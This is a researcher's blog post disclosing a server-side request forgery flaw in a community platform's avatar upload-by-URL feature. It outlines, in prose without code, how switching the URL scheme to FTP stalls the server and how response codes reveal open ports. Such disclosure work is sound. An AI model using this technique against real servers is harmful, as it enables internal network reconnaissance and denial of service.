SSRF(Server side request forgery) Causing port scan,DOS attack due to FTP Access

There was a functionality in lithium community platform and was applicable for all 400+ clients including paypal,HP,ATT and many more ,In community.[company].com to upload avatars and image  using URL .This allows to upload image file accessing URL.This caused SSRF which could produce severe and dangerous effect.Attacker can able to Scan internal and External Port,302 redirect at server level,FTP DOS and many.

Advisories published externaly  about my Zero day SSRF findings in Lithium Community Platform:


Short description

This article is about SSRF vulnerability  that I had recently found in an online helpdesk service provider company  portal ,causes port scan and FTP DOS attack.I was awarded for finding this.In this, profile Image Upload functionality in  user’s profile using Remote URL causing SSRF due to which attacker can do port scan,FTP dos attack and inappropriate information disclosure.

How does the vulnerability exist?
The company  provides services to customers to upload there photo or image through url.Generally there should be some validation steps to be followed in server side while giving this services to any user.Here there are two cases in Company.
Case 1:–) Disable unwanted protocols Allow only http and https to make requests to remote servers.But here FTP protocol access is opened. It seems that servers have VERY long timeout for their FTP requests. An attacker can use  target to block requests for a prolonged time and  FTP:// protocol which never timeouts.This will create DOS attack.


Below is upload via URL.


Intercept the request in Burp proxy and change to ftp and process the request.


Check the connection in netcat.

Check the timeout time in Burp which is 60Sec.

Case 2)—Port scan :–
Here attacker able to do portscan easily.Suppose I have to do portscan for domain from victim server .Then by looking the server response attacker  analyse which port is open and which is not open in the POC for more details.
For Valid Open Port it is showing  200OK response
For Valid closed Port it is showing 503/502 response



Validated the above result with nmap scan to

For your more info about SSRF:–

Published by


Hey! I am a security Researcher ,Tester and Hacker.Finding bug is my passion .

Leave a Reply

Your email address will not be published. Required fields are marked *